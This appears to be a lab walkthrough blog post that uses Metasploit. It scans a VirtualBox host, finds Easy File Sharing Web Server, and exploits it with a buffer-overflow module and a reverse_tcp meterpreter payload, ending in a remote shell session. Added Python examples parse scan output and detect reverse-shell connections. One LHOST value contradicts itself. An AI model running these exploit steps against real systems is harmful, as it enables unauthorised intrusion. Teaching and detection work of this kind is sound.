[MAD-METASPLOIT] 0x20 - Remote Exploit

HAHWUL auxiliary(vnc_login) > db_nmap -PN 192.168.56.101
[*] Nmap: Starting Nmap 7.01 ( https://nmap.org ) at 2017-08-07 15:17 KST
[*] Nmap: Nmap scan report for 192.168.56.101
[*] Nmap: Host is up (0.00072s latency).
[*] Nmap: Not shown: 983 closed ports
[*] Nmap: PORT     STATE SERVICE
[*] Nmap: 80/tcp   open  http
[*] Nmap: 135/tcp  open  msrpc
[*] Nmap: 139/tcp  open  netbios-ssn
[*] Nmap: 443/tcp  open  https
[*] Nmap: 445/tcp  open  microsoft-ds
[*] Nmap: 554/tcp  open  rtsp
[*] Nmap: 2869/tcp open  icslap
[*] Nmap: 5357/tcp open  wsdapi
[*] Nmap: 5500/tcp open  hotline
[*] Nmap: 5800/tcp open  vnc-http
[*] Nmap: 5900/tcp open  vnc
..snip..

Among the nmap results, port 80 (normally a web server) looks worth checking first.

HAHWUL > services

Services

host            port   proto  name          state     info
----            ----   -----  ----          -----     ----
192.168.56.101  23     tcp    telnet        filtered
192.168.56.101  80     tcp    http          open
192.168.56.101  135    tcp    msrpc         open
192.168.56.101  137    udp    netbios       open      HAHWUL:<00>:U :WORKGROUP:<00>:G :HAHWUL:<20>:U :WORKGROUP:<1e>:G :WORKGROUP:<1d>:U : MSBROWSE :<01>:G :08:00:27:69:14:ff
192.168.56.101  139    tcp    netbios-ssn   open
192.168.56.101  443    tcp    https         open
192.168.56.101  445    tcp    microsoft-ds  open
192.168.56.101  554    tcp    rtsp          open
192.168.56.101  2869   tcp    icslap        open
192.168.56.101  5357   tcp    wsdapi        open
192.168.56.101  5500   tcp    hotline       open
192.168.56.101  5800   tcp    vnc-http      open
192.168.56.101  5900   tcp    vnc           open      VNC protocol version [3, 4].8
192.168.56.101  10243  tcp    unknown       open
192.168.56.101  49152  tcp    unknown       open
192.168.56.101  49153  tcp    unknown       open
192.168.56.101  49154  tcp    unknown       open
192.168.56.101  49155  tcp    unknown       open
192.168.56.101  49156  tcp    unknown       open

Using NSE to pull more detailed information about that port..

HAHWUL > db_nmap --script=default -p 80 192.168.56.101
[*] Nmap: Starting Nmap 7.01 ( https://nmap.org ) at 2017-08-07 15:19 KST
[*] Nmap: Stats: 0:00:16 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
[*] Nmap: NSE Timing: About 99.07% done; ETC: 15:20 (0:00:00 remaining)
[*] Nmap: Nmap scan report for 192.168.56.101
[*] Nmap: Host is up (0.00051s latency).
[*] Nmap: PORT   STATE SERVICE
[*] Nmap: 80/tcp open  http
[*] Nmap: |_http-title: Login - powered by Easy File Sharing Web Server
[*] Nmap: MAC Address: 08:00:27:69:14:FF (Oracle VirtualBox virtual NIC)
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 19.94 seconds
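The two scans above are the whole basis for the rest of the post: a port table plus one NSE banner line that names the product. The following Python is an added example (not code from the post or from Metasploit) that parses db_nmap output in exactly that "[*] Nmap: ..." shape into service records, attaches NSE script results to the port they belong to, and produces the kind of exposure review a defender would run over the same data: watchlisted remote-access services and web banners that disclose a product name. The sample output and the WATCHLIST are constructed for the example.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: db_nmap output in the same "[*] Nmap: ..." shape the post
# shows (not the post's own capture; values chosen to match its scan results).
DB_NMAP_OUTPUT = """\
[*] Nmap: Starting Nmap 7.01 ( https://nmap.org ) at 2017-08-07 15:19 KST
[*] Nmap: Nmap scan report for 192.168.56.101
[*] Nmap: Host is up (0.00051s latency).
[*] Nmap: PORT     STATE SERVICE
[*] Nmap: 80/tcp   open  http
[*] Nmap: |_http-title: Login - powered by Easy File Sharing Web Server
[*] Nmap: 445/tcp  open  microsoft-ds
[*] Nmap: 5900/tcp open  vnc
[*] Nmap: MAC Address: 08:00:27:69:14:FF (Oracle VirtualBox virtual NIC)
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 19.94 seconds
"""

MSF_PREFIX = "[*] Nmap: "
HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")
# NSE result lines look like "|_name: value" or "| name: value";
# indented continuation lines ("|   key: value") are intentionally skipped.
SCRIPT_RE = re.compile(r"^\|[_ ]?([\w-]+):\s*(.*)$")


@dataclass
class Service:
    port: int
    proto: str
    state: str
    name: str
    scripts: dict = field(default_factory=dict)


def parse_db_nmap(text):
    """Return (host, [Service, ...]) parsed from msfconsole db_nmap output."""
    host, services, current = None, [], None
    for raw in text.splitlines():
        line = raw[len(MSF_PREFIX):] if raw.startswith(MSF_PREFIX) else raw
        line = line.strip()
        if m := HOST_RE.match(line):
            host = m.group(1)
        elif m := PORT_RE.match(line):
            current = Service(int(m.group(1)), m.group(2), m.group(3), m.group(4))
            services.append(current)
        elif (m := SCRIPT_RE.match(line)) and current is not None:
            current.scripts[m.group(1)] = m.group(2)  # NSE output belongs to the last port seen
    return host, services


# Constructed watchlist: services that give remote access or lateral-movement
# surface and should not face untrusted networks.
WATCHLIST = {"vnc", "vnc-http", "microsoft-ds", "netbios-ssn", "msrpc", "telnet"}


def exposure_report(services):
    """Open ports worth a second look: watchlisted services and banners naming a product."""
    findings = []
    for s in services:
        if s.state != "open":
            continue
        if s.name in WATCHLIST:
            findings.append((s.port, f"{s.name} exposed"))
        title = s.scripts.get("http-title")
        if title and "powered by" in title.lower():
            product = title.split("powered by", 1)[1].strip()
            findings.append((s.port, f"banner names product: {product}"))
    return findings


if __name__ == "__main__":
    host, svcs = parse_db_nmap(DB_NMAP_OUTPUT)
    for port, note in exposure_report(svcs):
        print(f"{host}:{port}  {note}")
```

A banner that names the product and version is what lets an attacker go straight from `search` to a working module, so the report treats a disclosing http-title as a finding in its own right, separate from the open port.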

The host is running Easy File Sharing Web Server. This server has a fair number of public vulnerabilities, and a quick search will turn up plenty of material on them.

Let's look it up directly in Metasploit.

HAHWUL > search easyfilesharing

Matching Modules

Name                                       Disclosure Date  Rank     Description
----                                       ---------------  ----     -----------
exploit/windows/ftp/easyfilesharing_pass   2006-07-31       average  Easy File Sharing FTP Server 2.0 PASS Overflow
exploit/windows/http/easyfilesharing_post  2017-06-12       normal   Easy File Sharing HTTP Server 7.2 POST Buffer Overflow
exploit/windows/http/easyfilesharing_seh   2015-12-02       normal   Easy File Sharing HTTP Server 7.2 SEH Overflow

As of now, three modules come up. All three are overflow vulnerabilities that allow obtaining a shell remotely. After picking whichever one you like..

HAHWUL > use exploit/windows/http/easyfilesharing_post
HAHWUL exploit(easyfilesharing_post) > show options

Module options (exploit/windows/http/easyfilesharing_post):

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
RHOST                   yes       The target address
RPORT  80               yes       The target port (TCP)

Exploit target:

Id  Name
--  ----
0   Easy File Sharing 7.2 HTTP

Now configure it.

HAHWUL exploit(easyfilesharing_post) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
HAHWUL exploit(easyfilesharing_post) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
HAHWUL exploit(easyfilesharing_post) > set LHOST 192.168.56.101
LHOST => 192.168.56.101
HAHWUL exploit(easyfilesharing_post) > set LPORT 4646
HAHWUL exploit(easyfilesharing_post) > show options

Module options (exploit/windows/http/easyfilesharing_post):

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
RHOST  192.168.56.101   yes       The target address
RPORT  80               yes       The target port (TCP)

Payload options (windows/meterpreter/reverse_tcp):

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
LHOST     192.168.56.100   yes       The listen address
LPORT     4646             yes       The listen port

Exploit target:

Id  Name
--  ----
0   Easy File Sharing 7.2 HTTP

Running the exploit..

HAHWUL exploit(easyfilesharing_post) > exploit -z

[*] Started reverse TCP handler on 192.168.56.100:4646
[*] Sending stage (956991 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.100:4646 -> 192.168.56.101:38258) at 2017-08-07 15:24:33 +0900
[*] Session 1 created in the background.
HAHWUL exploit(easyfilesharing_post) > sessions -l

Active sessions

Id  Type                 Information                      Connection
--  ----                 -----------                      ----------
1   meterpreter x86/windows  HAHWUL\Virtualbox @ HAHWUL   192.168.56.100:4646 -> 192.168.56.101:38258 (192.168.56.101)

A meterpreter shell has shown up under sessions, which means the attack succeeded.

HAHWUL exploit(easyfilesharing_post) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >

This is the general shape of a remote exploit.
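The session listing above is also the clearest host-side artefact of this attack: the web server process on 192.168.56.101 opened an outbound TCP connection from an ephemeral port (38258) to the handler on 192.168.56.100:4646, then pulled down a 956991-byte stage. A service that only ever accepts connections on 80/443 has no reason to initiate one. The Python below is an added example (not code from the post or from Metasploit) of a detection rule built on that observation: it runs over constructed host network-connection records modelled on Sysmon "Network connection" fields and flags any listen-only server process that initiates a connection. The process image name is a placeholder, not the real server binary's name, and the event records are constructed.

```python
from collections import namedtuple

# One host-side network-connection record, modelled on the fields a Sysmon
# "Network connection" event carries. `initiated` is True when the local
# process opened the connection (outbound), False when it accepted one.
Conn = namedtuple("Conn", "host image initiated src_ip src_port dst_ip dst_port")

# Baseline: service processes and the ports they are expected to listen on.
# A process in this table should only ever appear as the accepting side.
# The image name is a placeholder, not the real server binary's name.
SERVER_PROCESSES = {
    "fileshare-webserver.exe": {80, 443},
}

# Ports a server process might legitimately reach out to (DNS, updates);
# an outbound connection from such a process to anything else is rated higher.
EXPECTED_OUTBOUND_PORTS = {53, 80, 443}

# Constructed events (not real logs). The third mirrors the connection the
# post's session listing shows, seen from the compromised host's side.
EVENTS = [
    Conn("WS-101", "fileshare-webserver.exe", False, "192.168.56.101", 80, "192.168.56.100", 51234),
    Conn("WS-101", "outlook.exe", True, "192.168.56.101", 50012, "10.0.0.5", 443),
    Conn("WS-101", "fileshare-webserver.exe", True, "192.168.56.101", 38258, "192.168.56.100", 4646),
]


def reverse_shell_candidates(events, server_processes=SERVER_PROCESSES):
    """Flag server processes that initiate connections instead of accepting them."""
    alerts = []
    for e in events:
        if e.image.lower() not in server_processes:
            continue  # not a process held to the listen-only rule
        if not e.initiated:
            continue  # inbound to the service: normal client traffic
        severity = "medium" if e.dst_port in EXPECTED_OUTBOUND_PORTS else "high"
        alerts.append({
            "host": e.host,
            "image": e.image,
            "flow": f"{e.src_ip}:{e.src_port} -> {e.dst_ip}:{e.dst_port}",
            "severity": severity,
            "reason": "listening service process initiated an outbound connection",
        })
    return alerts


if __name__ == "__main__":
    for a in reverse_shell_candidates(EVENTS):
        print(a["severity"].upper(), a["host"], a["image"], a["flow"], "-", a["reason"])
```

The rule deliberately keys on direction and process identity rather than on the port number: the handler port is whatever the operator set with LPORT, so a rule that only watched for 4646 would miss the next run.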

Reference

https://www.exploit-db.com/exploits/39661/